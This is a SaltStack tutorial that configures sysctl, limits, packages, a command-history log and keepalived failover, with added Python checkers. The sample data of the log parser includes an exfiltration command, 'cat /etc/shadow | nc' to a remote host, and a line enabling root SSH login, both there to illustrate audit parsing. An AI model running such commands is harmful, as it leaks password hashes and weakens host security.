SaltStack practice case

SaltStack in practice

Environment:

salt-master:   192.168.0.106 (node1.xuejl.com)
salt-minion-1: 192.168.0.105 (node2.xuejl.com)
salt-minion-2: 192.168.0.106 (node1.xuejl.com)

There are two minions; node1.xuejl.com runs both salt-minion and salt-master.

What the states do:

1. Change the format of the user command log written from /etc/profile
2. Raise the open-file and process limits (the "maximum connections") in /etc/security/limits.conf
3. Install the required packages
4. Set the required kernel parameters in /etc/sysctl.conf
5. Install keepalived

Master configuration

Set file_roots in /etc/salt/master and restart salt-master so the change takes effect:

file_roots:
  base:
    - /srv/salt/base

mkdir -p /srv/salt/base
mkdir /srv/salt/base/{etc,init,src}

etc holds the configuration files to be distributed, init holds the initialisation sls files, and src holds source data such as install tarballs.

 

cat >/srv/salt/base/etc/sysctl.conf <<EOF
# Kernel sysctl configuration file for RedHat Linux
#
# For binary values, 0 is disabled, 1 is enabled.  See sysctl(8) and
# sysctl.conf(5) for more details.

# Controls IP packet forwarding.
# The RedHat default is 0.  It is set to 1 here because the tuning block at
# the bottom of this file used to re-declare it as 1, and for sysctl the
# last assignment wins.  Keep it at 1 only if these hosts really must route
# (LVS NAT/DR); an haproxy-based load balancer does not need forwarding.
net.ipv4.ip_forward = 1

# Controls source route verification
net.ipv4.conf.default.rp_filter = 1

# Do not accept source routing
net.ipv4.conf.default.accept_source_route = 0

# Controls the System Request debugging functionality of the kernel
kernel.sysrq = 0

# Controls whether core dumps will append the PID to the core filename.
# Useful for debugging multi-threaded applications.
kernel.core_uses_pid = 1

# Controls the use of TCP syncookies
net.ipv4.tcp_syncookies = 1

# Disable netfilter on bridges.
# These keys only exist while the bridge module is loaded; "sysctl -p"
# reports them as unknown keys otherwise (sysctl -e -p skips them).
net.bridge.bridge-nf-call-ip6tables = 0
net.bridge.bridge-nf-call-iptables = 0
net.bridge.bridge-nf-call-arptables = 0

# Controls the default maximum size of a message queue
kernel.msgmnb = 65536

# Controls the maximum size of a message, in bytes
kernel.msgmax = 65536

# Controls the maximum shared segment size, in bytes
kernel.shmmax = 68719476736

# Controls the maximum number of shared memory segments, in pages
kernel.shmall = 4294967296

# Tuning for a host that handles many short-lived connections
net.ipv4.tcp_tw_reuse = 1
# tcp_tw_recycle rejects SYNs from clients behind NAT whose TCP timestamps
# go backwards, and was removed from Linux 4.12.  Keep it only on hosts that
# never see NATed clients.
net.ipv4.tcp_tw_recycle = 1
net.ipv4.tcp_fin_timeout = 30
net.ipv4.ip_local_port_range = 5000     65000
net.ipv4.tcp_max_syn_backlog = 819200
vm.zone_reclaim_mode = 1
# Requires the nf_conntrack module to be loaded; unknown key otherwise.
net.nf_conntrack_max = 52420
EOF
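Before a sysctl.conf like the one above is pushed to every minion, a lint pass catches two things sysctl -p does not point out clearly: a key assigned twice with different values (sysctl silently applies the last one, which is how a stock RedHat line ip_forward = 0 followed by a tuning line ip_forward = 1 ends up enabling forwarding) and keys that only exist once a kernel module is loaded. The following is an added example in Python, not code from the page or from Salt; the sample input is a constructed excerpt, and the module and "risky setting" tables are assumptions for a RHEL 6 era kernel.

```python
"""Lint a sysctl.conf before file.managed distributes it.

Added example, not part of the original page.  Parsing follows the rule
sysctl -p applies: later assignments to the same key override earlier ones.
"""
import re

# Keys that only exist once a kernel module is loaded; "sysctl -p" reports
# them as unknown keys otherwise.  Assumption: RHEL 6 era kernel.
NEEDS_MODULE = {
    "net.bridge.bridge-nf-call-iptables": "bridge",
    "net.bridge.bridge-nf-call-ip6tables": "bridge",
    "net.bridge.bridge-nf-call-arptables": "bridge",
    "net.nf_conntrack_max": "nf_conntrack",
}

# Settings a reviewer should question on a load balancer (assumed list).
RISKY = {
    "net.ipv4.tcp_tw_recycle": "1",  # drops SYNs from NATed clients; removed in Linux 4.12
    "net.ipv4.ip_forward": "1",      # makes the host a router; LVS needs it, haproxy does not
}

# Constructed excerpt of the file above, with a duplicate ip_forward left in.
SAMPLE = """\
# Controls IP packet forwarding
net.ipv4.ip_forward = 0
net.ipv4.tcp_syncookies = 1
net.bridge.bridge-nf-call-iptables = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_tw_recycle = 1
net.ipv4.ip_forward=1
net.ipv4.ip_local_port_range = 5000     65000
this line is not an assignment
"""

LINE_RE = re.compile(r"^([\w.\-/]+)\s*=\s*(.*)$")


def parse_sysctl(text):
    """Return (effective, conflicts, bad_lines).

    effective: key -> last value assigned
    conflicts: (key, (line, old_value), (line, new_value)) for re-assignments
               with a different value; same-value repeats are harmless
    bad_lines: (line, text) for lines that are neither comment nor assignment
    """
    effective, seen, conflicts, bad = {}, {}, [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            bad.append((lineno, raw))
            continue
        key = m.group(1)
        value = " ".join(m.group(2).split())   # normalise "5000     65000"
        if key in seen and seen[key][1] != value:
            conflicts.append((key, seen[key], (lineno, value)))
        seen[key] = (lineno, value)
        effective[key] = value
    return effective, conflicts, bad


def review(text):
    """Human-readable findings for the file; an empty list means nothing to report."""
    effective, conflicts, bad = parse_sysctl(text)
    findings = ["line %d: not a key = value assignment: %r" % b for b in bad]
    for key, (l1, v1), (l2, v2) in conflicts:
        findings.append("%s is %s on line %d but %s on line %d; sysctl applies %s"
                        % (key, v1, l1, v2, l2, v2))
    for key, value in effective.items():
        if key in NEEDS_MODULE:
            findings.append("%s needs the %s module loaded, or sysctl -p fails on it"
                            % (key, NEEDS_MODULE[key]))
        if RISKY.get(key) == value:
            findings.append("%s = %s: confirm this is intended on a load balancer" % (key, value))
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE):
        print(finding)
```

Run it over the real file with review(open("/srv/salt/base/etc/sysctl.conf").read()) on the master; a clean file returns an empty list.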

cat >/srv/salt/base/etc/limits.conf <<EOF
# /etc/security/limits.conf
#
#Each line describes a limit for a user in the form:
#
#<domain>        <type>  <item>  <value>
#
#Where:
#<domain> can be:
#        - a user name
#        - a group name, with @group syntax
#        - the wildcard *, for default entry
#        - the wildcard %, can be also used with %group syntax,
#                 for maxlogin limit
#
#<type> can have the two values:
#        - "soft" for enforcing the soft limits
#        - "hard" for enforcing hard limits
#
#<item> can be one of the following:
#        - core - limits the core file size (KB)
#        - data - max data size (KB)
#        - fsize - maximum filesize (KB)
#        - memlock - max locked-in-memory address space (KB)
#        - nofile - max number of open files
#        - rss - max resident set size (KB)
#        - stack - max stack size (KB)
#        - cpu - max CPU time (MIN)
#        - nproc - max number of processes
#        - as - address space limit (KB)
#        - maxlogins - max number of logins for this user
#        - maxsyslogins - max number of logins on the system
#        - priority - the priority to run user process with
#        - locks - max number of file locks the user can hold
#        - sigpending - max number of pending signals
#        - msgqueue - max memory used by POSIX message queues (bytes)
#        - nice - max nice priority allowed to raise to values: [-20, 19]
#        - rtprio - max realtime priority
#
#<domain>      <type>  <item>         <value>
#

#*               soft    core            0
#*               hard    rss             10000
#@student        hard    nproc           20
#@faculty        soft    nproc           20
#@faculty        hard    nproc           50
#ftp             hard    nproc           0
#@student        -       maxlogins       4

*                soft    nproc           65535
*                hard    nproc           65535
*                soft    nofile          65535
*                hard    nofile          65535

# End of file
EOF

On RHEL/CentOS 6 note that /etc/security/limits.d/90-nproc.conf is read after limits.conf and sets a soft nproc of 1024 for every non-root user, which overrides the 65535 above; manage or remove that file as well if the process limit matters.

Change the user command-log format

cd /srv/salt/base/init

cat >log.sls <<'EOF'
user_log:
  file.append:
    - name: /etc/profile
    - text:
      - export HISTTIMEFORMAT="{\"TIME\":\"%F %T\",\"HOSTNAME\":\"$HOSTNAME\",\"LI\":\"$(who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g')\",\"LU\":\"$(who am i | awk '{print $1}')\",\"NU\":\"${USER}\",\"CMD\":\""
      - export PROMPT_COMMAND='history 1 | tail -1 | sed "s/^[ ]\+[0-9]\+  //" | sed "s/$/\"}/" >> /var/log/command.log'
EOF

The heredoc delimiter is quoted ('EOF') on purpose: without the quotes the shell on the master expands $HOSTNAME, $(who ...), ${USER} and $NF while writing the sls, and every minion would log the master's values. With the two lines appended to /etc/profile, each interactive bash session writes one JSON-style record per command to /var/log/command.log: timestamp, host, login IP (LI), login user (LU), the current user after su/sudo (NU) and the command (CMD).

Treat this as a convenience log, not as audit evidence. /var/log/command.log has to be writable by every user for the append to work, so any user can forge or truncate other users' records; the command text is inserted without escaping, so a command containing a double quote produces a record that is not valid JSON; and a user can simply unset PROMPT_COMMAND. For tamper-resistant command auditing use auditd (or pam_tty_audit) instead.
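The records these two lines produce, parsed as an added example (Python, not code from the page; the sample lines are constructed). It shows the quoting failure mode: the second sample record carries a command with double quotes and fails json.loads, so the parser falls back to a regex anchored on the fixed field prefix that HISTTIMEFORMAT emits and on the closing "} that PROMPT_COMMAND appends. It also pulls out the records where the login user and the effective user differ, which is where commands run after su or sudo show up.

```python
"""Parse /var/log/command.log records written by the HISTTIMEFORMAT trick.

Added example, not part of the original page.  The sample records are
constructed; the field names (TIME, HOSTNAME, LI, LU, NU, CMD) are the ones
the /etc/profile lines above emit.
"""
import json
import re

# HISTTIMEFORMAT emits a fixed prefix and PROMPT_COMMAND appends "}.  The
# command itself is never escaped, so json.loads() fails as soon as a command
# contains a double quote; this regex anchors on the fixed parts instead and
# takes everything in between as the command.
RECORD_RE = re.compile(
    r'^\{"TIME":"(?P<TIME>[^"]*)","HOSTNAME":"(?P<HOSTNAME>[^"]*)",'
    r'"LI":"(?P<LI>[^"]*)","LU":"(?P<LU>[^"]*)","NU":"(?P<NU>[^"]*)",'
    r'"CMD":"(?P<CMD>.*)"\}$'
)

# Constructed sample: one clean record, one whose command contains quotes,
# one run as root after sudo, and a line that is not a record at all.
SAMPLE_LOG = """\
{"TIME":"2015-06-01 10:02:11","HOSTNAME":"node2.xuejl.com","LI":"192.168.0.10","LU":"alice","NU":"alice","CMD":"sudo -i"}
{"TIME":"2015-06-01 10:02:30","HOSTNAME":"node2.xuejl.com","LI":"192.168.0.10","LU":"alice","NU":"root","CMD":"sed -i "s/PermitRootLogin no/PermitRootLogin yes/" /etc/ssh/sshd_config"}
{"TIME":"2015-06-01 10:03:05","HOSTNAME":"node2.xuejl.com","LI":"192.168.0.10","LU":"alice","NU":"root","CMD":"cat /etc/shadow | nc 10.0.0.5 4444"}
rsyslogd: restart
"""


def parse_record(line):
    """Return the record as a dict, or None if the line is not a record."""
    try:
        rec = json.loads(line)                 # fast path: well-formed record
        if isinstance(rec, dict) and "CMD" in rec:
            return rec
    except ValueError:
        pass
    m = RECORD_RE.match(line)                  # tolerant path: quotes inside CMD
    return m.groupdict() if m else None


def parse_log(text):
    """Split a log into (records, rejected_lines)."""
    records, rejected = [], []
    for line in text.splitlines():
        rec = parse_record(line)
        if rec is None:
            rejected.append(line)
        else:
            records.append(rec)
    return records, rejected


def privilege_changes(records):
    """Records where the effective user differs from the login user (su/sudo)."""
    return [r for r in records if r["LU"] != r["NU"]]


if __name__ == "__main__":
    recs, bad = parse_log(SAMPLE_LOG)
    for r in privilege_changes(recs):
        print("%s %s -> %s: %s" % (r["TIME"], r["LU"], r["NU"], r["CMD"]))
    print("unparsed lines:", bad)
```

The rejected list is worth keeping: on a real host it is where tampered or truncated records end up, and a sudden run of unparsable lines from one user is itself a signal.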

Install the required packages

cat >package.sls <<EOF
package:
  pkg.installed:
    - pkgs:
      - lrzsz
      - bind
      - lsof
      - telnet
      - gcc
      - gcc-c++
      - httpd
      - openssl-devel
EOF

pkg.installed only installs; it enables and starts nothing. Because top.sls targets '*', every minion gets this list, so check that bind and httpd are really wanted on every host: each installed daemon is attack surface and shows up in package-based vulnerability scans. gcc, gcc-c++ and openssl-devel are what the keepalived build below needs.

Set the kernel parameters

cat >sysctl.sls <<EOF
/etc/sysctl.conf:
  file.managed:
    - source: salt://etc/sysctl.conf
    - user: root
    - group: root
    - mode: 644
  cmd.run:
    - name: sysctl -e -p
    - onchanges:
      - file: /etc/sysctl.conf
EOF

file.managed only writes the file; on its own the values would take effect at the next boot. The cmd.run applies them right away, but only in runs where the file actually changed (onchanges), and -e makes sysctl skip keys whose module is not loaded (the net.bridge.* and nf_conntrack entries) instead of failing.

Raise the open-file and process limits

cat >ulimit.sls <<EOF
limit.conf:
  file.managed:
    - name: /etc/security/limits.conf
    - source: salt://etc/limits.conf
    - user: root
    - group: root
    - mode: 644
EOF

pam_limits reads the file at login, so the new limits apply to sessions opened afterwards; daemons that are already running keep the limits they started with until they are restarted.

Install keepalived

mkdir -p /srv/salt/base/init/keepalived
cd /srv/salt/base/init/keepalived

1. Installation

First put the downloaded keepalived tarball under /srv/salt/base/src. Minions trust whatever the master serves from salt://, so verify the tarball against the upstream checksum or signature when you download it, before it goes into the file root.

cat >install_keepalived.sls <<EOF
install.keepalived:
  file.managed:
    - name: /usr/local/src/keepalived-1.2.20.tar.gz
    - source: salt://src/keepalived-1.2.20.tar.gz
    - user: root
    - group: root
    - mode: 644
  cmd.run:
    - name: cd /usr/local/src && tar -zxf keepalived-1.2.20.tar.gz && cd keepalived-1.2.20 && ./configure --prefix=/usr/local/keepalived --sysconfdir=/etc && make && make install
    - unless: test -x /usr/local/keepalived/sbin/keepalived
    - require:
      - file: install.keepalived
EOF

A state function takes exactly one name, so the unpack, configure and build steps are chained into a single command. unless makes the build run once instead of on every highstate, and require orders it after the tarball copy. The build needs the gcc, gcc-c++ and openssl-devel packages from package.sls, which env_init.sls includes first. With --sysconfdir=/etc the install places a sample configuration at /etc/keepalived/keepalived.conf and the service defaults at /etc/sysconfig/keepalived; the sample is only a starting point, the template actually used is written next.

 

 

cat >/srv/salt/base/etc/keepalived.conf <<EOF
! Configuration File for keepalived

global_defs {
   notification_email {
     #sysadmin@firewall.loc
   }
   #notification_email_from Alexandre.Cassen@firewall.loc
   #smtp_server 192.168.200.1
   #smtp_connect_timeout 30
   router_id LVS_DEVEL
}

! "killall -0 haproxy" succeeds only while an haproxy process exists.
! The weight (-4) must exceed the priority gap between the two nodes
! (101 vs 100), otherwise a failed check never demotes the MASTER.
vrrp_script chk_haproxy {
    script "killall -0 haproxy"
    interval 2
    weight -4
}

vrrp_instance VI_1 {
    state {{ state1 }}
    interface eth0
    virtual_router_id {{ routerid }}
    priority {{ priority }}
    advert_int 1
    authentication {
        auth_type PASS
        auth_pass 1111
    }
    virtual_ipaddress {
        {{ vip }}
    }
    track_script {
        chk_haproxy
    }
}

vrrp_instance VI_2 {
    state {{ state2 }}
    interface eth0
    virtual_router_id {{ routerid1 }}
    priority {{ priority1 }}
    advert_int 1
    authentication {
        auth_type PASS
        auth_pass 2222
    }
    virtual_ipaddress {
        {{ vip2 }}
    }
    track_script {
        chk_haproxy
    }
}
EOF

Two points about this template. First, the failover arithmetic: with priorities 101 and 100 a script weight of -4 is enough, because when haproxy dies on the MASTER its effective priority drops to 97, below the BACKUP's 100, and the VIP moves; a weight smaller than the priority gap would leave a dead haproxy holding the VIP. Second, auth_type PASS is a plaintext password of at most 8 characters carried in every VRRP advertisement. It keeps two misconfigured clusters from merging, but anyone on the same L2 segment can read it and inject a higher-priority advertisement to take the VIP. Restrict VRRP (IP protocol 112) with the host firewall so that only the peer's address is accepted, and do not run VRRP on a segment shared with untrusted hosts.

Set the keepalived configuration file contents

cat >keepalived_conf_file.sls <<EOF
keepalived_conf_file:
  file.managed:
    - name: /etc/keepalived/keepalived.conf
    - source: salt://etc/keepalived.conf
    - template: jinja
    - user: root
    - group: root
    - mode: 644
    - defaults:
        priority: {{ salt['pillar.get']('keepalived:priority') }}
        priority1: {{ salt['pillar.get']('keepalived:priority1') }}
        vip: {{ salt['pillar.get']('keepalived:vip') }}
        vip2: {{ salt['pillar.get']('keepalived:vip2') }}
        routerid: {{ salt['pillar.get']('keepalived:routerid') }}
        routerid1: {{ salt['pillar.get']('keepalived:routerid1') }}
        state1: {{ salt['pillar.get']('keepalived:state1') }}
        state2: {{ salt['pillar.get']('keepalived:state2') }}
EOF

Note: the configuration file above is a Jinja template (template: jinja) and its variables are filled from the defaults mapping. The sls itself is rendered with Jinja first, so each {{ salt['pillar.get'](...) }} is replaced by that minion's pillar value before the YAML is parsed. If the pillar has not reached a minion yet, pillar.get returns an empty value and the rendered keepalived.conf ends up with blank state, priority and VIP fields, so check salt '<minion>' pillar.get keepalived before the first highstate.

 

Configure keepalived's log (by default keepalived's messages go to /var/log/messages)

cat >keepalived_log.sls <<EOF
keepalived_log:
  file.replace:
    - name: /etc/sysconfig/keepalived
    - pattern: KEEPALIVED_OPTIONS="-D"
    - repl: KEEPALIVED_OPTIONS="-D -d -S 0"
EOF

-S 0 sends keepalived's messages to the syslog facility local0 and -d additionally dumps the parsed configuration at start-up. file.replace does nothing when the pattern is absent (append_if_not_found defaults to False), so if the defaults file is missing or the options line has already been edited by hand, the state reports no change and logging stays in /var/log/messages.

Set where the log is written

cat >keepalived_rsyslog.sls <<EOF
keepalived_log_config:
  file.append:
    - name: /etc/rsyslog.conf
    - text: "local0.*                                     /var/log/keepalived.log"
  cmd.run:
    - name: /etc/init.d/rsyslog restart
    - onchanges:
      - file: keepalived_log_config
EOF

onchanges restricts the restart to runs in which the rsyslog line was actually appended; without it every highstate, including the scheduled one described at the end, would bounce rsyslog. Make sure nothing else on these hosts already logs to local0, or its messages will land in keepalived.log as well.

Running that many state files one by one gets messy, so they are pulled in from a single file:

cat >/srv/salt/base/init/env_init.sls <<EOF
include:
  - init.hosts
  - init.sysctl
  - init.package
  - init.ulimit
  - init.keepalived.install_keepalived
  - init.keepalived.keepalived_rsyslog
  - init.keepalived.keepalived_log
  - init.keepalived.keepalived_conf_file
  - init.log
EOF

The keepalived states live in /srv/salt/base/init/keepalived/, so their include names carry the keepalived path component. init.hosts is not written anywhere on this page: create /srv/salt/base/init/hosts.sls or remove that line, because an included sls that does not exist makes the whole highstate fail to render. With that, everything is loaded from one place.

Next, the pillar configuration for keepalived. pillar_roots is set in /etc/salt/master (restart salt-master after changing it):

pillar_roots:
  base:
    - /srv/pillar

mkdir -p /srv/pillar/env_init
cd /srv/pillar/env_init

cat >keepalived.sls <<EOF
keepalived:
  {% if grains['id'] == 'node1.xuejl.com' %}
  state1: BACKUP
  routerid: 51
  priority: 100
  vip: 192.168.0.253
  state2: MASTER
  routerid1: 151
  priority1: 101
  vip2: 192.168.0.254
  {% elif grains['id'] == 'node2.xuejl.com' %}
  state1: MASTER
  routerid: 51
  priority: 101
  vip: 192.168.0.253
  state2: BACKUP
  routerid1: 151
  priority1: 100
  vip2: 192.168.0.254
  {% else %}
  port: 80
  {% endif %}
EOF

This is the keepalived pillar data: node2 is MASTER for VRID 51 (192.168.0.253) and node1 for VRID 151 (192.168.0.254), each with priority 101 against the peer's 100, so both nodes carry traffic and each takes over the other's VIP on failure. Keying the branches on grains['id'] is fine because the id is bound to the key the master accepted; other grains are reported by the minion itself and should not be used to hand out secrets. After writing the file, refresh the pillar on the minions:

salt '*' saltutil.refresh_pillar

and then inspect what each minion received; each node should show its own state and priority values:

salt '*' pillar.items
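The pillar above and the template it feeds, cross-checked as an added example (Python, not code from the page or from Salt). It copies the two pillar branches and an abridged copy of the template, substitutes the {{ name }} variables the way the defaults mapping of keepalived_conf_file.sls would, and then checks what a second MASTER or a wrong priority would do: for every virtual_router_id exactly one node may be MASTER, the MASTER must hold the higher priority, both nodes must agree on the VIP, and the track_script weight must exceed the priority gap, otherwise a dead haproxy leaves the VIP where it is. Running it against a deliberately broken pillar is the point; it is cheaper than finding two nodes answering ARP for the same VIP.

```python
"""Cross-check the keepalived pillar above before the first highstate.

Added example, not part of the original page.  It re-implements only the
{{ name }} substitution that Salt's Jinja renderer performs for this
template, with the pillar values copied from keepalived.sls, and then
checks the two rendered configurations against each other.
"""
import re

# Pillar as each minion receives it from the grains['id'] branches above.
PILLAR = {
    "node1.xuejl.com": dict(state1="BACKUP", routerid=51, priority=100, vip="192.168.0.253",
                            state2="MASTER", routerid1=151, priority1=101, vip2="192.168.0.254"),
    "node2.xuejl.com": dict(state1="MASTER", routerid=51, priority=101, vip="192.168.0.253",
                            state2="BACKUP", routerid1=151, priority1=100, vip2="192.168.0.254"),
}

# The parts of the template above that the checks need (abridged copy).
TEMPLATE = """\
vrrp_script chk_haproxy {
    script "killall -0 haproxy"
    interval 2
    weight -4
}

vrrp_instance VI_1 {
    state {{ state1 }}
    virtual_router_id {{ routerid }}
    priority {{ priority }}
    virtual_ipaddress {
        {{ vip }}
    }
}

vrrp_instance VI_2 {
    state {{ state2 }}
    virtual_router_id {{ routerid1 }}
    priority {{ priority1 }}
    virtual_ipaddress {
        {{ vip2 }}
    }
}
"""

# An instance body runs up to the first "}" at the start of a line.
INSTANCE_RE = re.compile(r"vrrp_instance\s+(\w+)\s*\{(.*?)\n\}", re.S)


def render(template, values):
    """Substitute {{ name }}; an undefined name fails, as Salt's strict Jinja does."""
    def sub(m):
        name = m.group(1)
        if name not in values:
            raise KeyError("template variable %r is not in the pillar" % name)
        return str(values[name])
    return re.sub(r"\{\{\s*(\w+)\s*\}\}", sub, template)


def parse_instances(config):
    """Map vrrp_instance name -> state, vrid, priority, vip from a rendered config."""
    out = {}
    for name, body in INSTANCE_RE.findall(config):
        out[name] = {
            "state": re.search(r"\bstate\s+(\w+)", body).group(1),
            "vrid": int(re.search(r"virtual_router_id\s+(\d+)", body).group(1)),
            "priority": int(re.search(r"\bpriority\s+(\d+)", body).group(1)),
            "vip": re.search(r"virtual_ipaddress\s*\{\s*([\d.]+)", body).group(1),
        }
    return out


def check_cluster(pillar, template):
    """Return a list of problems; an empty list means the pair is consistent."""
    problems = []
    weight = abs(int(re.search(r"weight\s+(-?\d+)", template).group(1)))
    by_vrid = {}
    for node, values in pillar.items():
        instances = parse_instances(render(template, values))
        vrids = [i["vrid"] for i in instances.values()]
        if len(vrids) != len(set(vrids)):
            problems.append("%s: the same virtual_router_id is used twice" % node)
        for inst in instances.values():
            by_vrid.setdefault(inst["vrid"], []).append((node, inst))
    for vrid, members in sorted(by_vrid.items()):
        masters = [node for node, inst in members if inst["state"] == "MASTER"]
        if len(masters) != 1:
            problems.append("VRID %d: %d nodes configured MASTER, want exactly one" % (vrid, len(masters)))
        if len({inst["vip"] for _, inst in members}) != 1:
            problems.append("VRID %d: nodes disagree on the VIP" % vrid)
        ranked = sorted(((inst["priority"], node) for node, inst in members), reverse=True)
        if len(ranked) > 1 and ranked[0][0] == ranked[1][0]:
            problems.append("VRID %d: equal priorities, VRRP breaks the tie by IP address" % vrid)
        elif masters and ranked[0][1] != masters[0]:
            problems.append("VRID %d: %s is MASTER but %s has the higher priority" % (vrid, masters[0], ranked[0][1]))
        if len(ranked) > 1 and ranked[0][0] - ranked[1][0] >= weight:
            problems.append("VRID %d: priority gap %d >= script weight %d, a failed haproxy check does not reliably demote the MASTER"
                            % (vrid, ranked[0][0] - ranked[1][0], weight))
    return problems


if __name__ == "__main__":
    print(check_cluster(PILLAR, TEMPLATE) or "keepalived pillar is consistent")
```

With the pillar exactly as written above the check returns an empty list; flip node1's state1 to MASTER and it reports two MASTERs for VRID 51.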

The pillar files are likewise loaded through one include file:

cat >init.sls <<EOF
include:
  - env_init.keepalived
EOF

Because it is named init.sls inside the env_init directory, this file is addressed as env_init. Pillar data reaches a minion only through the pillar top file, so /srv/pillar/top.sls must exist and, with the same base / '*' structure as the state top.sls below, list env_init for every minion; without it pillar.items shows no keepalived key and the keepalived.conf template renders with empty values.

At this point roughly all the state files we need are written; only top.sls remains, which loads and runs them:

cat >/srv/salt/base/top.sls <<EOF
base:
  '*':
    - init.env_init
EOF

Now run it. A dry run first shows which files and packages would change on each minion without touching anything:

salt '*' state.highstate test=True

and then the real run:

salt '*' state.highstate

That applies the whole set.

To get something like puppet's periodic agent run, where every minion re-applies its state every 30 minutes, a schedule can be set through pillar:

schedule:
  highstate:
    function: state.highstate
    minutes: 30

state.highstate takes no SLS argument; its first positional parameter is test, so passing args to it (for example "- top") would turn the scheduled run into a permanent dry run that never changes anything. Refresh the pillar after adding the schedule and the minions start running highstate on that interval. Any manual change to a managed file is then reverted within 30 minutes, which is the drift protection you want, but it also means that whatever is pushed to the master reaches every host automatically, so keep write access to /srv/salt and /srv/pillar as tight as root on the minions.